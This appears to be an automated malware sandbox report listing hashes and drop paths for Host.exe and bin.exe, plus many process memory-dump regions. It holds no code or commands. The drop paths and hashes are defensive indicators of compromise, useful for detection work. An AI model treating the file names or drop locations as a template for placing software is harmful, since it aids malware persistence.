29b108e40acb05c3c9c2fa8c19b166e3

SHA1
892c676275a723822d2d47dc1a48defec8bde643

SHA256
4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

SHA512
9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

Download Submit
C:\Users\Admin\AppData\Roaming\Install\Host.exe

Filesize
1.2MB

MD5
29b108e40acb05c3c9c2fa8c19b166e3

SHA1
892c676275a723822d2d47dc1a48defec8bde643

SHA256
4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

SHA512
9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

Download Submit
\Users\Admin\AppData\Local\Temp\bin.exe

Filesize
1.2MB

MD5
29b108e40acb05c3c9c2fa8c19b166e3

SHA1
892c676275a723822d2d47dc1a48defec8bde643

SHA256
4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

SHA512
9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

Download Submit
\Users\Admin\AppData\Local\Temp\bin.exe

Filesize
1.2MB

MD5
29b108e40acb05c3c9c2fa8c19b166e3

SHA1
892c676275a723822d2d47dc1a48defec8bde643

SHA256
4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

SHA512
9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

Download Submit
\Users\Admin\AppData\Roaming\Install\Host.exe

Filesize
1.2MB

MD5
29b108e40acb05c3c9c2fa8c19b166e3

SHA1
892c676275a723822d2d47dc1a48defec8bde643

SHA256
4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

SHA512
9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

Download Submit
memory/268-144-0x0000000000000000-mapping.dmp

Download
memory/564-123-0x0000000000000000-mapping.dmp

Download
memory/592-124-0x0000000000000000-mapping.dmp

Download
memory/768-59-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-64-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-83-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-91-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-99-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-107-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-115-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-67-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-54-0x000000002F1D1000-0x000000002F1D4000-memory.dmp

Filesize
12KB

Download
memory/768-171-0x0000000072CFD000-0x0000000072D08000-memory.dmp

Filesize
44KB

Download
memory/768-55-0x0000000071D11000-0x0000000071D13000-memory.dmp

Filesize
8KB

Download
memory/768-60-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/768-57-0x0000000072CFD000-0x0000000072D08000-memory.dmp

Filesize
44KB

Download
memory/768-133-0x0000000072CFD000-0x0000000072D08000-memory.dmp

Filesize
44KB

Download
memory/768-58-0x0000000076871000-0x0000000076873000-memory.dmp

Filesize
8KB

Download
memory/768-61-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-66-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-62-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-65-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-75-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/768-63-0x0000000000666000-0x0000000000671000-memory.dmp

Filesize
44KB

Download
memory/856-127-0x0000000000000000-mapping.dmp

Download
memory/940-158-0x000000000041AD7B-mapping.dmp

Download
memory/940-166-0x0000000000400000-0x000000000044F000-memory.dmp

Filesize
316KB

Download
memory/984-131-0x0000000000000000-mapping.dmp

Download
memory/1072-126-0x0000000000000000-mapping.dmp

Download
memory/1292-139-0x0000000000E20000-0x0000000000F4E000-memory.dmp

Filesize
1.2MB

Download
memory/1292-137-0x0000000000000000-mapping.dmp

Download
memory/1292-142-0x0000000009560000-0x0000000009636000-memory.dmp

Filesize
856KB

Download
memory/1292-141-0x00000000003F0000-0x0000000000410000-memory.dmp

Filesize
128KB

Download
memory/1292-143-0x0000000008FB0000-0x000000000903C000-memory.dmp

Filesize
560KB

Download
memory/1312-134-0x0000000000000000-mapping.dmp

Download
memory/1616-130-0x0000000000000000-mapping.dmp

Download
memory/1976-164-0x0000000000000000-mapping.dmp

Download
memory/1976-168-0x0000000000210000-0x000000000033E000-memory.dmp

Filesize
1.2MB

Download